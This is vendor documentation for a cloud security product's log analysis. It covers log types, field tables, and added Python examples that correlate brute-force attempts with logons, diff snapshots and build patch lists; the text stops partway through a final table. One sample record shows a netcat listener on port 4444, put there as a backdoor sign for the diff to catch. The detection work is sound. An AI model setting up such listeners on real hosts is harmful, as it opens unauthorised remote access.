The log analysis feature of Security Center provides centralized storage, query, and analysis of host activities and security events to facilitate security audits, event tracing, and threat discovery. This topic describes the log types that Security Center supports, the differences between editions, the log fields, and provides query examples.
Version support
Subscription
Host logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Logon logs | |||||
Network connection logs | |||||
Process startup logs | |||||
Brute-force attack logs | |||||
DNS query logs | |||||
Client event logs | |||||
Account snapshot logs | |||||
Network snapshot logs | |||||
Process snapshot logs |
Security logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Security alert logs | Note Only alerts supported by the Basic edition are recorded. | ||||
Vulnerability logs | Note Only vulnerabilities supported by the Basic edition are recorded. | ||||
Network defense logs | |||||
Core file monitoring event logs | |||||
CSPM - Baseline checks |
Value-added service logs
If you enable the following value-added services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (baseline check logs and CSPM logs)
Pay-as-you-go service
If you purchase the Host and Container Security pay-as-you-go service, the supported log types vary depending on the protection level that is bound to the server.
Host logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Logon logs | ||||
Network connection logs | ||||
Process startup logs | ||||
Brute-force attack logs | ||||
DNS query logs | ||||
Client event logs | ||||
Account snapshot logs | ||||
Network snapshot logs | ||||
Process snapshot logs |
Security logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Security alert logs | Note Only alerts supported for the Unprotected level are recorded. | |||
Vulnerability logs | Note Only vulnerabilities that are not covered by a protection level are recorded. | |||
Network defense logs | ||||
Core file monitoring event logs |
Pay-as-you-go Service Logs
If you enable the following pay-as-you-go services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (baseline check logs and CSPM logs)
Log type descriptions
The following log samples and field descriptions are for reference only. The specific fields are subject to change with product updates. For the most accurate information, refer to the data collected in Simple Log Service.
Host logs
__topic__: aegis-log-login
Log content: Records user logon events on servers, including the source IP address, username, and logon result.
Description: Helps you monitor user activities and promptly identify and respond to abnormal behavior.
Important: Security Center does not support collecting logon logs for the Windows Server 2008 operating system.
Collection period: Real-time.
__topic__: aegis-log-network
Log content: Records network connection activities on the server in real time, including information such as the connection 5-tuple and associated processes.
Description: Helps you discover abnormal connection behavior, identify potential network attacks, and optimize network performance.
Important: The server collects only some connection statuses from establishment to termination. Inbound traffic is not recorded.
Collection period: Real-time.
__topic__: aegis-log-process
Log content: Records startup events for all new processes on the server, including information such as the process name, command-line parameters, and the parent process.
Description: Helps you understand the startup status and configuration of processes in the system and detect issues such as abnormal process activities, malware intrusions, and security threats.
Collection period: Real-time. Logs are reported immediately after a process starts.
__topic__: aegis-log-crack
Log content: Records brute-force attack behavior, including attempts to log on to and crack systems, applications, or accounts.
Description: Helps you identify brute-force attacks, detect abnormal logons, weak passwords, and credential leaks. These logs also support event response and forensic analysis.
Collection period: Real-time.
__topic__: aegis-snapshot-host
Log content: Records detailed information about user accounts in a system or application, including basic account properties such as the username, password policy, and logon history.
Description: By comparing snapshots from different points in time, you can monitor account changes and promptly detect security issues such as unauthorized access and abnormal account statuses.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__: aegis-snapshot-port
Log content: Records network connection information, including the connection 5-tuple, connection status, and associated processes.
Description: Helps you understand the active network connections in your system, discover abnormal connection behavior, and identify potential network attacks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__: aegis-snapshot-process
Log content: Records process activities in the system, including the process ID, name, and startup time.
Description: Use these logs to understand process activities and resource usage, and detect issues such as abnormal processes, high CPU usage, and memory leaks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__: aegis-log-dns-query
Log content: Records DNS query requests that are initiated by the server, including information such as the queried domain name, query type, and source.
Important: Log collection is not supported for Linux servers with a kernel version earlier than 4.X.X.
Description: Use these logs to analyze DNS activities and detect issues such as abnormal queries, domain hijacking, and DNS pollution.
Collection period: Real-time.
__topic__: aegis-log-client
Log content: Records the online and offline events of the Security Center agent.
Description: Helps you monitor the running status of the Security Center agent.
Collection period: Real-time.
Security logs
All security logs are collected in real time.
__topic__: sas-vul-log
Log content: Records information about vulnerabilities found in your systems or applications, including the vulnerability name, status, and handling action.
Description: Helps you understand the vulnerabilities, security risks, and attack trends in your system so that you can take timely remediation measures.
__topic__: sas-hc-log
Log content: Records the results of baseline risk checks, including information such as the baseline level, category, and risk level.
Important: Only data for check items that fail for the first time is recorded. Data for check items that previously passed but now fail a new check is also recorded.
Description: Helps you understand the baseline security status and potential risks of your system.
__topic__: sas-security-log
Log content: Records security events and alerts that occur in your system or application, including the alert data source, details, and alert level.
Description: Helps you understand the security events and threats in your system so that you can take appropriate response measures.
CSPM - Cloud platform configuration check logs
__topic__: sas-cspm-log
Log content: Records information such as cloud platform configuration check results and whitelisting operations.
Description: Helps you understand configuration issues and potential security risks in your cloud platform.
__topic__: sas-net-block
Log content: Records network attack events, including key information such as the attack type and source/destination IP addresses.
Description: Helps you understand security events on your network so that you can take response and defense measures to improve network security.
__topic__: sas-rasp-log
Log content: Records attack alert information from Runtime Application Self-Protection (RASP), including the attack type, behavioral data, and attacker IP address.
Description: Helps you understand security events in your application so that you can take response and defense measures to improve application security.
__topic__: sas-filedetect-log
Log content: Records detection results from the malware detection software development kit (SDK), including file information, detection scenario, and results.
Description: Helps you identify and promptly handle malicious programs in offline files or cloud storage.
Core file monitoring event logs
__topic__: aegis-file-protect-log
Log content: Records alert events detected by the core file monitoring feature, including the file path, operation type, and alert level.
Description: Helps you monitor whether core files are stolen or tampered with.
__topic__: sas-agentless-log
Log content: Records security risks detected in cloud servers, disk snapshots, and images. These risks include vulnerabilities, baselines, malicious samples, and sensitive files.
Description: Helps you view the security risk status of your assets over different time periods to identify and respond to potential threats.
Host log fields
Logon logs
Field name | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | IP address of the server to log on to. | 221.11.XX.XX |
dst_port | The logon port of the server. | 22 |
login_type | The logon type. Valid values include but are not limited to: | SSH |
username | The logon username. | admin |
login_count | The number of logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network connection logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
net_connect_dir | The direction of the network connection. Valid values: | in |
dst_ip | The IP address of the network connection receiver. | 192.168.XX.XX |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_name | The filename of the parent process. | /usr/bin/bash |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The process name. | nginx |
proc_path | The process path. | /usr/local/nginx/sbin/nginx |
proc_start_time | The startup time of the process. | N/A |
connection_type | The protocol. Valid values: | tcp |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name associated with the grandparent process. | containerd-shim |
status | The network connection status. Valid values: | 5 |
type | The type of real-time network connection. Valid values: | listen |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Process startup logs
Field Name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
cmd_index | The index of each parameter in the command line. Each pair of indexes indicates the start and end of a parameter. | 0,3,5,8 |
cmdline | The full command line for starting the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name associated with the process. | N/A |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
cwd | The directory where the process is running. | N/A |
proc_name | The process filename. | ipset |
proc_path | The full path of the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The user group. | group1 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | The parent process filename. | kube-proxy |
parent_proc_path | The full path of the parent process file. | /usr/local/bin/kube-proxy |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_start_time | The process startup time. | 2024-08-01 16:45:40 |
parent_proc_start_time | The startup time of the parent process. | 2024-07-12 19:45:19 |
sas_group_name | The asset group of the server in Security Center. | default |
srv_cmd | The command line of the grandparent process. | /usr/bin/containerd |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
uid | The user ID. | 123 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Brute-force attack logs
Field name | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that is subject to brute-force attacks. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server that is subject to brute-force attacks. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | The number of failed logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
src_ip | The source IP address for the logon. | 47.92.XX.XX |
dst_port | The logon port. | 22 |
login_type | The logon type. Valid values: | SSH |
username | The logon username. | user |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
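The brute-force attack logs and the logon logs share the uuid, src_ip, username, dst_port and start_time fields, which is what makes them useful together: a source that generated many failed attempts against a server and then appears in that server's logon log a short time later is the case an analyst wants surfaced first. The following is an added example, not Security Center's own code: it takes a batch of constructed records in the shape of the two tables above and reports successful logons that follow a burst of failures from the same source. The failure threshold, the time window and the sample records are assumptions.

```python
"""Correlate brute-force attack logs (__topic__ aegis-log-crack) with logon logs
(__topic__ aegis-log-login) coming from the same source IP address.

Added example, not Security Center's own code. Field names (uuid, src_ip, username,
login_type, dst_port, login_count, start_time) follow the tables above; the records,
the failure threshold and the time window are constructed assumptions."""

# Constructed sample records. start_time is a Unix timestamp in seconds, as in the tables.
SAMPLE_LOGS = [
    {"__topic__": "aegis-log-crack", "uuid": "uuid-a", "src_ip": "47.92.0.1",
     "username": "root", "login_type": "SSH", "dst_port": 22, "login_count": 40, "start_time": 1719472000},
    {"__topic__": "aegis-log-crack", "uuid": "uuid-a", "src_ip": "47.92.0.1",
     "username": "admin", "login_type": "SSH", "dst_port": 22, "login_count": 35, "start_time": 1719472060},
    {"__topic__": "aegis-log-login", "uuid": "uuid-a", "src_ip": "47.92.0.1",
     "username": "admin", "login_type": "SSH", "dst_port": 22, "login_count": 1, "start_time": 1719472214},
    {"__topic__": "aegis-log-login", "uuid": "uuid-a", "src_ip": "192.168.0.5",
     "username": "ops", "login_type": "SSH", "dst_port": 22, "login_count": 3, "start_time": 1719472300},
    {"__topic__": "aegis-log-crack", "uuid": "uuid-b", "src_ip": "203.0.113.9",
     "username": "root", "login_type": "SSH", "dst_port": 22, "login_count": 5, "start_time": 1719472400},
]

FAIL_THRESHOLD = 20    # assumed: failed attempts per (server, source IP) before the source counts as an attacker
WINDOW_SECONDS = 3600  # assumed: a successful logon this soon after the last failure is worth an alert


def failed_attempts(records):
    """Sum login_count of aegis-log-crack records per (uuid, src_ip).

    Returns {(uuid, src_ip): (total_failed, time_of_last_failure)}.
    """
    totals = {}
    for r in records:
        if r.get("__topic__") != "aegis-log-crack":
            continue
        key = (r["uuid"], r["src_ip"])
        total, last = totals.get(key, (0, 0))
        totals[key] = (total + int(r["login_count"]), max(last, int(r["start_time"])))
    return totals


def successes_after_failures(records, fail_threshold=FAIL_THRESHOLD, window=WINDOW_SECONDS):
    """Return logon-log records from a source that crossed fail_threshold against the same
    server, where the logon happened within `window` seconds after that source's last failure."""
    totals = failed_attempts(records)
    hits = []
    for r in records:
        if r.get("__topic__") != "aegis-log-login":
            continue
        total, last_failure = totals.get((r["uuid"], r["src_ip"]), (0, 0))
        delay = int(r["start_time"]) - last_failure
        if total >= fail_threshold and 0 <= delay <= window:
            hits.append({
                "uuid": r["uuid"], "src_ip": r["src_ip"], "username": r["username"],
                "login_type": r["login_type"], "dst_port": r["dst_port"],
                "failed_before": total, "seconds_after_last_failure": delay,
            })
    return hits


if __name__ == "__main__":
    for hit in successes_after_failures(SAMPLE_LOGS):
        print(hit)
```

Because login_count already merges repeated attempts within one minute, the sum is the right measure of volume; counting records instead would undercount a fast attacker. The correlation key includes uuid so that a source IP hammering one server does not taint a legitimate logon from the same address on another server.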
Account snapshot logs
Field Name | Description | Example |
account_expire | The expiration time of the account. never indicates that the account never expires. | never |
domain | The domain or directory service to which the account belongs. N/A indicates that the account does not belong to any domain. | N/A |
groups | The group to which the account belongs. N/A indicates that the account does not belong to any group. | ["nscd"] |
home_dir | The home directory. This is the default location for storing and managing files in the system. | /Users/abc |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon to the account. N/A indicates that the account has never been logged on to. | 2023-08-18 09:21:21 |
login_ip | The remote IP address of the last logon to the account. N/A indicates that the account has never been logged on to. | 192.168.XX.XX |
passwd_expire | The expiration date of the password. never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values: | 0 |
sas_group_name | The asset group of the server in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the user account. Valid values: | 0 |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
username | The username. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date for the password expiration reminder. never indicates that a reminder is never sent. | 2024-08-20 |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network snapshot logs
Field name | Description | Example |
net_connect_dir | The direction of the network connection. Valid values: in — inbound. | in |
dst_ip | The IP address of the peer, which is generally empty. | |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
pid | The process ID. | 682 |
proc_name | The process name. | sshd |
connection_type | The protocol. Valid values: | tcp4 |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The local IP address. | 100.127.XX.XX |
src_port | The listening port. | 41897 |
status | The value 2 indicates that the port is listening (listen), and the associated src_ip/src_port represents the listening address. | 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
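The snapshot logs are only useful when two collection runs are compared, as the description of the account snapshot log says, and the network snapshot log is worth the same treatment: a listener that was bound to loopback and is now bound to 0.0.0.0, or a port that was not listening before, is exactly what the comparison should surface. The following is an added example, not Security Center's own code, that serves both the account snapshot table and the network snapshot table above. It uses the field names from those tables; the snapshot records are constructed, the perm values 0 and 1 are assumed to mean "no" and "yes", and which fields count as security-relevant is a choice made here.

```python
"""Compare two asset-fingerprint snapshots and report what changed between them.

Added example, not Security Center's own code. It uses the account snapshot
(aegis-snapshot-host) fields username, perm, shell, groups and status and the
network snapshot (aegis-snapshot-port) fields status, connection_type, src_ip,
src_port and proc_name from the tables above; the snapshot records are constructed
(perm 0/1 = no/yes is assumed), and the choice of watched fields is an assumption."""


def index_snapshot(records, key_fields):
    """Index records by the tuple of their key fields; a later duplicate wins."""
    return {tuple(r.get(f) for f in key_fields): r for r in records}


def diff_snapshots(old, new, key_fields, watch_fields):
    """Return keys added, keys removed, and per-key (old, new) pairs for watched fields."""
    old_idx = index_snapshot(old, key_fields)
    new_idx = index_snapshot(new, key_fields)
    added = sorted(set(new_idx) - set(old_idx))
    removed = sorted(set(old_idx) - set(new_idx))
    changed = {}
    for key in set(old_idx) & set(new_idx):
        delta = {f: (old_idx[key].get(f), new_idx[key].get(f))
                 for f in watch_fields if old_idx[key].get(f) != new_idx[key].get(f)}
        if delta:
            changed[key] = delta
    return {"added": added, "removed": removed, "changed": changed}


def account_changes(old, new):
    """Accounts are keyed by username; perm, shell, groups and status are watched."""
    return diff_snapshots(old, new, ("username",), ("perm", "shell", "groups", "status"))


def listener_changes(old, new):
    """Only listening sockets (status 2, per the table above) are compared, keyed by
    protocol and port, so a bind address moving from loopback to 0.0.0.0 shows as a change."""
    def listening(recs):
        return [r for r in recs if r.get("status") == 2]
    return diff_snapshots(listening(old), listening(new),
                          ("connection_type", "src_port"), ("src_ip", "proc_name"))


# Constructed account snapshots from two collection runs on one server.
ACCOUNTS_T0 = [
    {"username": "root", "perm": 1, "shell": "/bin/bash", "groups": ["root"], "status": 0},
    {"username": "nscd", "perm": 0, "shell": "/sbin/nologin", "groups": ["nscd"], "status": 0},
    {"username": "deploy", "perm": 0, "shell": "/bin/bash", "groups": ["deploy"], "status": 0},
]
ACCOUNTS_T1 = [
    {"username": "root", "perm": 1, "shell": "/bin/bash", "groups": ["root"], "status": 0},
    {"username": "nscd", "perm": 1, "shell": "/bin/bash", "groups": ["nscd"], "status": 0},     # service account made interactive
    {"username": "backup2", "perm": 0, "shell": "/bin/bash", "groups": ["wheel"], "status": 0},  # account not seen before
]

# Constructed network snapshots for the same two runs (status 5 stands in for a non-listening socket).
PORTS_T0 = [
    {"status": 2, "connection_type": "tcp4", "src_ip": "0.0.0.0", "src_port": 22, "proc_name": "sshd"},
    {"status": 2, "connection_type": "tcp4", "src_ip": "127.0.0.1", "src_port": 3306, "proc_name": "mysqld"},
    {"status": 5, "connection_type": "tcp4", "src_ip": "192.168.0.5", "src_port": 41897, "proc_name": "sshd"},
]
PORTS_T1 = [
    {"status": 2, "connection_type": "tcp4", "src_ip": "0.0.0.0", "src_port": 22, "proc_name": "sshd"},
    {"status": 2, "connection_type": "tcp4", "src_ip": "0.0.0.0", "src_port": 3306, "proc_name": "mysqld"},  # now bound to all interfaces
    {"status": 2, "connection_type": "tcp4", "src_ip": "0.0.0.0", "src_port": 4444, "proc_name": "nc"},
]

if __name__ == "__main__":
    print(account_changes(ACCOUNTS_T0, ACCOUNTS_T1))
    print(listener_changes(PORTS_T0, PORTS_T1))
```

Keying listeners by protocol and port rather than by the full tuple is deliberate: with src_ip in the key, the mysqld rebind would appear as one removal plus one addition and the continuity with the earlier listener would be lost. The same diff function works for the process snapshot log by keying on proc_path and watching md5.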
Process snapshot logs
Field Name | Description | Example |
cmdline | The full command line for starting the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash of the binary file. Note The MD5 hash is not calculated for process files larger than 1 MB. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | The process filename. | assist_daemon |
proc_path | The full path of the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The process ID. | 1692 |
pname | The parent process filename. | systemd |
sas_group_name | The asset group of the server in Security Center. | default |
proc_start_time | The process startup time. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
DNS query logs
Field Name | Description | Example |
domain | The domain name corresponding to the DNS query. | example.aliyundoc.com |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that initiated the DNS query. | 192.168.XX.XX |
pid | The process ID that initiated the DNS query. | 3544 |
ppid | The parent process ID that initiated the DNS query. | 3408 |
cmd_chain | The process chain that initiated the DNS query. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | The command line that initiated the DNS query. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path of the process that initiated the DNS query. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group of the server in Security Center. | default |
time | The time when the DNS query event was captured. This time is generally the same as the time when the DNS query occurred. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiated the DNS query. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Client event logs
Field Name | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | The client version. | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The operating system type. Valid values: | linux |
region_id | The region ID where the server resides. | cn-beijing |
status | The agent status. Valid values: | online |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Security log fields
Vulnerability logs
Field Name | Description | Example |
vul_alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
risk_level | The risk level. Valid values: | later |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
instance_name | The hostname. | hhht-linux-*** |
vul_name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
operation | The action performed on the vulnerability. Valid values: | new |
status | The status. Valid values: | 1 |
tag | The tag of the vulnerability. Valid values: | oval |
type | The vulnerability type. Valid values: | sys |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
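The extend_content field carries the part of a vulnerability log that remediation actually needs: the CVE list, the packages whose installed version matched the vulnerable range, and the update command per package. It is stored as a JSON string inside the record, so a consumer has to parse it and must cope with a record whose string is malformed or truncated. The following is an added example, not Security Center's own code: it groups "new" vulnerability records by host and produces a remediation list from the extend_content layout shown in the table above. The two records are constructed, and reading result=true in rpmEntityList as "this package matched the vulnerable range" is an assumption.

```python
"""Build a per-host remediation list from vulnerability logs (__topic__ sas-vul-log).

Added example, not Security Center's own code. The extend_content layout (cveList,
rpmEntityList[].name / version / updateCmd / result) and the other field names follow
the vulnerability log table above; the two records are constructed, and extend_content
is kept as the JSON string the log carries. Treating result=true as "package matched
the vulnerable range" is an assumption."""
import json
from collections import defaultdict

SAMPLE_VUL_LOGS = [
    {
        "uuid": "uuid-a", "instance_name": "web-01", "type": "sys", "operation": "new",
        "status": 1, "risk_level": "later", "vul_name": "centos:7:cesa-2023:1335",
        "vul_alias_name": "CESA-2023:1335: openssl Security Update",
        "extend_content": json.dumps({
            "cveList": ["CVE-2023-0286"],
            "necessity": {"total_score": 0.0, "status": "normal"},
            "rpmEntityList": [
                {"name": "openssl-libs", "version": "1.0.2k-25.el7_9",
                 "updateCmd": "yum update openssl-libs", "result": True},
                {"name": "openssl", "version": "1.0.2k-25.el7_9",
                 "updateCmd": "yum update openssl", "result": True},
            ],
        }),
    },
    {   # constructed: a record whose extend_content was truncated in transit
        "uuid": "uuid-b", "instance_name": "db-01", "type": "sys", "operation": "new",
        "status": 1, "risk_level": "later", "vul_name": "centos:7:cesa-2023:1335",
        "vul_alias_name": "CESA-2023:1335: openssl Security Update",
        "extend_content": '{"cveList":["CVE-2023-0286"],"rpmEntityList":[{"name":"op',
    },
]


def parse_extend_content(raw):
    """extend_content arrives as a JSON string; a malformed one yields {} instead of
    aborting the whole batch, so the host still appears in the plan (with no details)."""
    try:
        data = json.loads(raw) if isinstance(raw, str) else raw
    except ValueError:
        return {}
    return data if isinstance(data, dict) else {}


def remediation_plan(records):
    """Group records with operation == "new" by host and collect the vulnerability names,
    CVEs, affected packages (name -> installed version) and the distinct update commands."""
    plan = defaultdict(lambda: {"vulnerabilities": set(), "cves": set(), "packages": {}, "commands": []})
    for r in records:
        if r.get("operation") != "new":
            continue
        host = plan[(r["uuid"], r.get("instance_name", ""))]
        host["vulnerabilities"].add(r["vul_name"])
        ext = parse_extend_content(r.get("extend_content"))
        host["cves"].update(ext.get("cveList", []))
        for rpm in ext.get("rpmEntityList", []):
            if not rpm.get("result", True):   # assumed: result=false means the package did not match
                continue
            host["packages"][rpm["name"]] = rpm.get("version")
            cmd = rpm.get("updateCmd")
            if cmd and cmd not in host["commands"]:
                host["commands"].append(cmd)
    return dict(plan)


if __name__ == "__main__":
    for host, todo in remediation_plan(SAMPLE_VUL_LOGS).items():
        print(host, sorted(todo["cves"]), todo["commands"])
```

The host with the truncated extend_content still shows up in the plan with the vulnerability name and no CVEs or commands, which is the behaviour an operator wants: a parsing failure should be visible as an incomplete entry, not as a silently missing host.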
CSPM - Baseline check logs
Field name | Description | Example |
check_item_name | The name of the check item. | Set minimum interval for password changes |
check_item_level | The check level of the baseline. Valid values: | medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
risk_level | The risk level of the risk item. Valid values: | medium |
operation | The operation. Valid values: | new |
risk_name | The name of the risk item. | Password policy compliance check |
sas_group_name | The asset group of the server on which the risk item is detected in Security Center. | default |
status | The status. Valid values: | 1 |
sub_type_alias_name | The alias of the subtype. | International security best practices - Ubuntu 16/18/20/22 security baseline check |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias_name | The alias of the type. | International security best practices |
type_name | The baseline type. For valid values of the baseline type, see List of baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Security alert logs
Field name | Description | Example |
data_source | The data source. Valid values: | aegis_login_log |
detail | A JSON object that provides detailed context for the alert. The fields in this object vary based on the alert type. The following describes common fields of the | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Unusual Account Logon to ECS","status":0} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
level | The risk level of the alert event. Valid values: | suspicious |
name | The alert name. | Anomalous Logon - Unusual Account Logon to ECS |
operation | The operation. Valid values: | new |
status | The status of the alert. Valid values: | 1 |
unique_info | The unique identifier of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server that generated the alert. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
suspicious_event_id | The alert event ID. | 650226318 |
handle_time | The time corresponding to the operation. | 1765272845 |
alert_first_time | The time when the alert first occurred. | 1764226915 |
alert_last_time | The time when the alert last occurred. | 1765273425 |
strict_mode | Indicates whether the alert is a strict mode alert. Valid values: true, false. | true |
user_id | The account ID. | 1358******3357 |
CSPM - Cloud platform configuration check logs
Field name | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to obtain the ID. | 11 |
check_item_name | The name of the check item. | Origin fetch configuration |
